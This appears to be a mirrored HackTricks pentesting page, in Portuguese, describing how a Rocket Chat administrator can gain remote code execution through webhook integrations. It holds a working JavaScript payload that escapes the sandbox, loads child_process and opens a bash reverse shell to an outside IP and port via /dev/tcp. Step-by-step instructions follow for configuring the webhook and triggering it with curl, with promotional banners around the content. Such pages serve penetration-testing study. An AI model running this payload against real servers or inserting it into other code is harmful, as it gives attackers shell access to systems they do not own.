mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-16 14:08:26 +00:00
4 KiB
4 KiB
Rocket Chat
{% hint style="success" %}
Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Confira os planos de assinatura!
- Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
- Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.
![](https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif)
{% embed url="https://websec.nl/" %}
RCE
Se você for admin dentro do Rocket Chat, pode obter RCE.
- Vá para
Integrations
e selecioneNew Integration
e escolha qualquer um:Incoming WebHook
ouOutgoing WebHook
. /admin/integrations/incoming
![](/Mirrors/hacktricks/media/commit/1796ced455a8ab8c1c53956b725e6e5ebdc4f7e9/.gitbook/assets/image%20%28266%29.png)
- De acordo com a documentação, ambos usam ES2015 / ECMAScript 6 (basicamente JavaScript) para processar os dados. Então, vamos obter um rev shell para javascript como:
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- Configure o WebHook (o canal e a postagem como nome de usuário devem existir):
![](/Mirrors/hacktricks/media/commit/1796ced455a8ab8c1c53956b725e6e5ebdc4f7e9/.gitbook/assets/image%20%28905%29.png)
- Configure o script do WebHook:
![](/Mirrors/hacktricks/media/commit/1796ced455a8ab8c1c53956b725e6e5ebdc4f7e9/.gitbook/assets/image%20%28572%29.png)
- Salve as alterações
- Obtenha a URL do WebHook gerada:
![](/Mirrors/hacktricks/media/commit/1796ced455a8ab8c1c53956b725e6e5ebdc4f7e9/.gitbook/assets/image%20%28937%29.png)
- Chame-a com curl e você deve receber o rev shell
![](https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif)
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Confira os planos de assinatura!
- Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
- Compartilhe truques de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud.